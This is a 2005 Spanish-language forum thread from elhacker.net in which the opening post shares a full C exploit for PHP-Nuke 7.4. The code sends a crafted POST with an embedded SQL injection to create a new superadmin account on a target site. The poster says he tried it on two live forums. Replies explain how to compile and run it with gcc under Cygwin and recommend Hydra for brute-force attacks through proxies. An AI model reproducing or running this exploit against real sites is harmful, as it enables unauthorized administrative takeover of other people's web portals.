elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:56  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  PHP nuke v7.4 Xploit 		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: PHP nuke v7.4 Xploit  (Leído 4,009 veces)
-EvilBuffer-

Desconectado Desconectado

Mensajes: 112


/(bb|[^b]{2})/


Ver Perfil WWW
PHP nuke v7.4 Xploit
« en: 28 Marzo 2005, 03:51 »
Saludos me encontre este Xploit en la red, ya lo probre con 2 foros  :D

Código:
/****************************************************
* *
* phpNUKE v7.4 exploit *
* *
* this exploit create new admin with relative *
* passwd that you specified on parameter of exploit *
* you take administrative control of the webPortal *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 07/02/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron.group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80 // port of web server

void info(void);
void sendxpl(FILE *out, char *argv[]);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);

int main(int argc, char *argv[]){

FILE *out;
int sock, sockconn;
struct sockaddr_in addr;
struct hostent *hp;

if(argc!=5)
   info();
   
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
   errsock();
   
   system("clear");
   printf("[*] Creating socket [OK]\n");

if((hp = gethostbyname(argv[1])) == NULL)
   errgeth();
   
   printf("[*] Resolving victim host [OK]\n");
   
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
   errconn(argv);
   
   printf("[*] Connecting at victim host [OK]\n");
   
out = fdopen(sock,"a");
setbuf(out,NULL);

sendxpl(out,argv);

   printf("[*] Now check your username and password\n"
          " on http://%s%s\n\n",argv[1],argv[2]);

shutdown(sockconn,2);
close(sockconn);

return 0;

}


void info(void){

system("clear");
printf("#########################################\n"
       "# phpNUKE v7.4 exploit #\n"
       "#########################################\n"
       "# this exploit create an admin with #\n"
       "# the relative password, for your fun. #\n"
       "# exploit coded by Silentium #\n"
       "# Anacron Group Italy #\n"
       "# www.autistici.org/anacron-group-italy #\n"
       "#########################################\n\n"
       "[Use]\n\n"
       " silePNUKExpl <victim_host> <path_adminpage> <username> <password>\n\n"
       "[example]\n\n"
       " silePNUKExpl www.victim.com /admin.php sile silePass\n\n");
exit(1);

}


void sendxpl(FILE *out, char *argv[]){

int size = 145;

size+=sizeof(argv[3]);
size+=sizeof(argv[4]);
   
    fprintf(out,"POST %s HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "add_aid=%s&add_name=morte&add_pwd=%s&add_email=email%%40mail.com&admin="
                "eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit="
                "Create+Admin\n\n",argv[2],argv[1],size,argv[3],argv[4]);
                 
                 printf("[*] Sending exploit [OK]\n\n");

}
           
                 
void errsock(void){

system("clear");
printf("[x] Creating socket [FAILED]\n\n");
exit(1);

}


void errgeth(void){

printf("[x] Resolving victim host [FAILED]\n\n");
exit(1);

}


void errconn(char *argv[]){

printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]);
exit(1);

}

Saludos y portence bien  8)
En línea
<< RTFM && STFW >>
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #1 en: 28 Marzo 2005, 05:37 »
duda tonta... como se sabe la version de un phpnuke??? he mirado abajo donde pone powered phpnuke.. pero no esta la version.
En línea
-EvilBuffer-

Desconectado Desconectado

Mensajes: 112


/(bb|[^b]{2})/


Ver Perfil WWW
Re: PHP nuke v7.4 Xploit
« Respuesta #2 en: 29 Marzo 2005, 04:47 »

desconozco si se puede ver la version del php nuke, pero si puedes probarlo, aver si jala  :D

No se pierde nada con intentarlo
En línea
<< RTFM && STFW >>
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Re: PHP nuke v7.4 Xploit
« Respuesta #3 en: 29 Marzo 2005, 07:07 »
Para ver la versión puedes verlo por ejemplo accediendo a las estadísticas.
En línea
orphen_nb

Desconectado Desconectado

Mensajes: 133


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #4 en: 29 Marzo 2005, 08:01 »
o mira a ver en el codigo fuente...
En línea
Human knowledge belongs to the world
BorDitO

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #5 en: 1 Abril 2005, 02:29 »
Hola soy un pelin noob en este tema, querria saber q tengo q hacer con ese codigo, lo tengo q compilar? si es asi con q programa? gracias
En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 17.232


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: PHP nuke v7.4 Xploit
« Respuesta #6 en: 1 Abril 2005, 02:51 »
BorDitO lee un poco antes que tus mensajes se empeizen a borrar misteriosamente.......

Sí, se tiene que compilar, con un compilador.
En línea
"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir
BorDitO

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #7 en: 3 Abril 2005, 01:53 »
lo siento por no aver leido antes y gracias por aclararme mi duda
En línea
arod

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #8 en: 3 Abril 2005, 05:33 »
que alguien lo compile  a ver si tiene errores y como podemos utilizarlo desde windows ?
En línea
The Love is like a war:
*Easy to start
*Hard to End
*Impossible to Forget
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #9 en: 3 Abril 2005, 05:44 »
pues gcc exploit.c -o exploit a mi desde cygwin no me a dado ningun problema, luego.. /exploit host  admin.php user pass
te dice que visites la pagina.. pruebas el login y pass a ver si entra, yo lo probe y no me funciono.
En línea
rodimus

Desconectado Desconectado

Mensajes: 42



Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #10 en: 3 Abril 2005, 07:12 »
Holas la verdad es k soy nuevo en esta materia del hacking ...pero kisiera aprender xD:D espero k usteds me puedan ayudar ..la verdad no se k hacer con elkodigo del xploit para php-nuke espero k me puedan decir paso por paso k se hace si esk se puede claro  ante todod GRAXIAS AMIGOS
En línea
fandango
Another
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.953


Powered By Slackware!


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #11 en: 3 Abril 2005, 07:39 »
Cita de: rodimus en  3 Abril 2005, 07:12
Holas la verdad es k soy nuevo en esta materia del hacking ...pero kisiera aprender xD:D espero k usteds me puedan ayudar ..la verdad no se k hacer con elkodigo del xploit para php-nuke espero k me puedan decir paso por paso k se hace si esk se puede claro  ante todod GRAXIAS AMIGOS

Porque no lees un poco y buscas, mira lo que le ha contestado el-brujo a BorDitO.
En línea
BorDitO

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #12 en: 3 Abril 2005, 09:06 »
Aora querria pediros si alguno sabe algun proxy socks q funcione con el brutus porq e probado uno y no me funciona, espero q no se me borre el post por algo
En línea
fandango
Another
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.953


Powered By Slackware!


Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #13 en: 3 Abril 2005, 11:56 »
Fijate por aqui: http://www.atomintersoft.com/products/alive-proxy

Mejor usa el Hydra para hacer ataques de fuerza bruta, el brutus ya no va mas.
En línea
rockero

Desconectado Desconectado

Mensajes: 98



Ver Perfil
Re: PHP nuke v7.4 Xploit
« Respuesta #14 en: 3 Abril 2005, 14:44 »
Cita de: alb3rt0 en  3 Abril 2005, 05:44
pues gcc exploit.c -o exploit a mi desde cygwin no me a dado ningun problema, luego.. /exploit host  admin.php user pass
te dice que visites la pagina.. pruebas el login y pass a ver si entra, yo lo probe y no me funciono.
yo quisiera saber cual es el comando exacto que se pone desde Cygwin pues eh estado quebrandome la cabeza tratando de compilarlo no lo eh logrado, eh guardado el exploit como exploitphp.c  alguien me podria dar un hilo como se compila
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Que significa XPLOIT?
Hacking Básico 		puntoinfinito 1 430 Último mensaje 19 Marzo 2012, 19:39
por WHK
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines